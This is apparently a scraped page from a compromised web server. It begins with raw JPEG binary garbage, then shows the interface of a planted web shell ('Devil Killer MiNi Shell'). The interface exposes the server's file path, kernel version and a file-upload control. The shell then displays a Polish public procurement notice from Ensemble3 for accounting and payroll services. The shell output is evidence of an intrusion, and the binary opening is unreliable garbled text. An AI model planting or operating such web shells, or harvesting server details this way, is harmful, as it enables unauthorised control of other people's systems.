JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220602/0019203201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa kompleksowej obsługi księgowej i kadrowo-płacowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ensemble3</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 386406355</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wólczyńska 133</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-919</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@ensemble3.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ensemble3.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność B+R </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa kompleksowej obsługi księgowej i kadrowo-płacowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3d442e0b-d4ff-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00192032</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> The project has received funding from the European Union’s Horizon 2020 research and innovation programme under grant agreement No 857543 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ensemble3.eu/public-procurement <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://ensemble3.eu/public-procurement; https://platformazakupowa.pl/pn/ensemble3</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone formie<br/>elektronicznej za pośrednictwem platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/ensemble3<br/>2. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza, opcjonalnie, komunikację za<br/>pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami:<br/>przetargi@ensemble3.eu<br/>3. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące<br/>odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na<br/>platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>Wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM.<br/>5. Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIE PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące<br/>specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za<br/>pośrednictwem platformazakupowa.pl, tj.:<br/>5.1.stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>5.2.komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>5.3. zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>5.4. włączona obsługa JavaScript,<br/>5.5. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>5.6. Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>6. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>7. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>7.1.akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem (https://platformazakupowa.pl/strona/1-regulamin) w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>7.2.zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>8.Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”).<br/>10. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>11. Szczegóły w pkt 3 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna na temat uprawnień wynikających z rozporządzenia RODO została<br/>zawarta w pkt. 19 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna na temat uprawnień wynikających z rozporządzenia RODO została<br/>zawarta w pkt. 19 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/TPBN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 617801,29 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 262836,41 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa kompleksowej obsługi księgowej i kadrowo-płacowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79200000-6 - Usługi księgowe, audytorskie i podatkowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówienia na podobne usługi o wartości szacunkowej:<br/>266836,41 netto. Zamawiający przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. Zamawiający<br/>przewiduje zawarcie umowy na 29 miesięcy do końca trwania projektu na warunkach wynegocjowanych zgodnie z przepisami ww<br/>art. uPzp</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cena - jako Szacowana wartość zamówienia, do 50 pkt. 2. Doświadczenie kluczowego personelu, do 50 pkt. Doświadczenie to zostało podzielone na podkryteria: 2.1. „Doświadczenie - Kwalifikacje osób wyznaczonych do realizacji zamówienia tj. Specjalisty ds. Spraw Kadrowo-Płacowych i Specjalista ds. Finansowo-Księgowych” („Kwalifikacje”), do 25 pkt. W tym podkryteria: 2.1.1 doświadczenie Specjalisty ds. Spraw Kadrowo-Płacowych, do 12,5 pkt. 2.1.2. doświadczenie Specjalista ds. Finansowo-Księgowych, do 12,5 pkt. 2.2 Doświadczenie- „Kwalifikacje osoby wyznaczonej do realizacji zamówienia tj. „Specjalista ds. Finansowo-Księgowych” („Kwalifikacje B+R”) tj. 2.2.1 doświadczenia specjalisty ds. Finansowo – Księgowych w zakresie świadczenia usług księgowych na rzecz podmiotów, których przedmiotem działalności były badania naukowe lub/i prace rozwojowe (dział 72 PKD)Wykazywane doświadczenie musi być zdobyte w okresie ostatnich 2 lat przed wszczęciem postępowania, do 12,5 pkt. 2.2.2 doświadczenia specjalisty ds. Finansowo – Księgowych w zakresie świadczenia usług księgowych na rzecz podmiotów, które uzyskały w okresie ostatnich 2 lat bezzwrotne dofinansowanie ze środków publicznych, Wykazywane doświadczenie musi być zdobyte w okresie ostatnich 2 lat przed wszczęciem postępowania, do 12,5 pkt. Szczegółowy opis zawarty jest w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje osób wyznaczonych do realizacji zamówienia tj. Specjalisty ds. Spraw Kadrowo Płacowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12,5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje osób wyznaczonych do realizacji zamówienia Specjalista ds. FinansowoKsięgowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12,5</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje osoby wyznaczonej do realizacji zamówienia tj. „Specjalista ds. Finansowo-Księgowych” („Kwalifikacje B+R”) w zakresie świadczenia usług księgowych na rzecz podmiotów, których przedmiotem działalności były badania naukowe i prace rozwojowe (dział 72 PKD).</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12,5</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje osoby wyznaczonej do realizacji zamówienia tj. „Specjalista ds. Finansowo-Księgowych” („Kwalifikacje B+R”) w zakresie świadczenia usług księgowych na rzecz podmiotów, które uzyskały bezzwrotne dofinansowanie ze środków publicznych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">12,5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Sytuacja ekonomiczna lub finansowa<br/>Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 100 000,00 zł.<br/>2. Zdolność techniczna lub zawodowa<br/>2.1 w odniesieniu do posiadania wiedzy i doświadczenia Wykonawcy, tj.:<br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki udziału dotyczące:<br/>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje należycie co najmniej 3 usługi, z których:<br/>a) każda trwała nieprzerwanie przez okres co najmniej 12 miesięcy,<br/>b) co najmniej jedna polegała na świadczeniu usług księgowych,<br/>c) co najmniej jedna polegała na świadczeniu usług kadrowych<br/>d) co najmniej dwie z tych umów były o wartości co najmniej 100 000,00 PLN wraz z podatkiem VAT,<br/>Uwaga:<br/>• Pod pojęciem usługi Zamawiający rozumie jedną umowę zawartą z jednym podmiotem;<br/>• Pod pojęciem usługi wykonanej należy rozumieć usługę zrealizowaną (zakończoną);<br/>• Pod pojęciem usługi wykonywanej należy rozumieć usługę będącą w trakcie realizacji (usługę aktualnie wykonywaną),<br/>przy czym jeśli Wykonawca powoła się na usługę realizowaną, musi wykazać, że jej już zrealizowana część spełnia ww.<br/>wymagania;<br/>• Wykonawca może wykazać się usługą o szerszym zakresie niż wskazany w warunku zamówienia, jednak usługa ta musi<br/>spełniać wymagania minimalne określone w niniejszym SWZ. W wykazie usług należy wskazać zarówno wartość całej<br/>usługi, jak również podać wartość usługi dotyczącej określonej w niniejszym warunku;<br/>• W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o wykonanie zamówienia wystarczy, że<br/>powyższy warunek spełni jeden z nich samodzielnie; Wykonawcy mogą spełnić warunek łącznie.<br/>• Zamawiający nie dopuszcza możliwości sumowania usług z różnych kontraktów w celu uzyskania ww. wartości<br/>minimalnej.<br/>2.2 w odniesieniu do potencjału osobowego, tj.:<br/>a) będzie dysponował do realizacji przedmiotu umowy min. 1 osobą - specjalistą ds. finansowo-księgowych która posiada<br/>minimum 24 miesięczne (przepracowane niezależnie od formy zatrudnienia pełne miesiące) doświadczenie w zakresie<br/>finansowo – księgowym oraz posada wyższe wykształcenie ekonomiczne (II stopnia – magister) . Wykazywane doświadczenie musi być zdobyte w okresie ostatnich 4 lat przed wszczęciem postępowania.<br/>b) będzie dysponował do realizacji przedmiotu umowy min. 1 osobą - specjalistą ds. kadrowo-płacowych, która posiada<br/>minimum 24 miesięczne (przepracowane niezależnie od formy zatrudnienia pełne miesiące) oraz posada wyższe<br/>wykształcenie ekonomiczne (II stopnia – magister). Wykazywane doświadczenie musi być zdobyte w okresie ostatnich 4 lat przed wszczęciem postępowania.<br/>c) będzie dysponował do realizacji przedmiotu umowy min. 1 osobą – koordynatorem umowy, który posiada minimum 24<br/>miesięczne (przepracowane niezależnie od formy zatrudnienia pełne miesiące) doświadczenie na stanowisku<br/>kierowniczym/zarządczym/właścicielskim, która odpowiadała za koordynowanie realizacji umów. Wykazywane doświadczenie musi być zdobyte w okresie ostatnich 4 lat przed wszczęciem postępowania<br/>Zamawiający nie dopuszcza, łączenia funkcji, o których mowa w pkt. a),b).<br/>Wykonawca, skieruje ww. osoby do realizacji przedmiotu Umowy.<br/>Dodatkowo doświadczenie wskazanych osób będzie podlegało ocenie w ramach kryterium oceny ofert opisanym w pkt<br/>14.2.1.2 SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na wezwanie Zamawiającego, Wykonawca którego oferta została najwyżej oceniona zobowiązany jest do złożenia, celem wykazania<br/>spełnienia postawionych warunków udziału w pkt. 10.5. SWZ, w wyznaczonym terminie nie krótszym niż 5 dni, aktualnych na dzień<br/>złożenia następujących podmiotowych środków dowodowych:<br/>1. Wykaz usług, którego wzór stanowi Załącznik nr 5 do SWZ, wraz z załączeniem dowodów określających, że usługi te zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego usługa była wykonywana. W przypadku usług nadal wykonywanych - referencje bądź inne dokumenty potwierdzające<br/>ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wykonawca nie jest w stanie uzyskać ww. dowodów – oświadczenie Wykonawcy.<br/>UWAGA: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami,<br/>Wykaz wykonanych usług dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2. Wykaz kluczowych osób, skierowanych do realizacji zamówienia, którego wzór stanowi Załącznik nr 6 do SWZ, potwierdzający<br/>warunek określony w pkt 10.5.4.2 SWZ.<br/>3. Dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie, o którym<br/>mowa w art. 125 ust. 1 ustawy, potwierdzające że Wykonawca na dzień składania ofert nie podlega wykluczeniu z udziału w<br/>postępowaniu oraz spełnia warunki udziału w postępowaniu – którego wzór stanowi załącznik nr 4 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia dokumenty wymienione w pkt 11.2 SWZ powinny dotyczyć<br/>tego Wykonawcy spośród Wykonawców składających wspólną ofertę, który wykazuje spełnienie warunków w zakresie i na<br/>zasadach 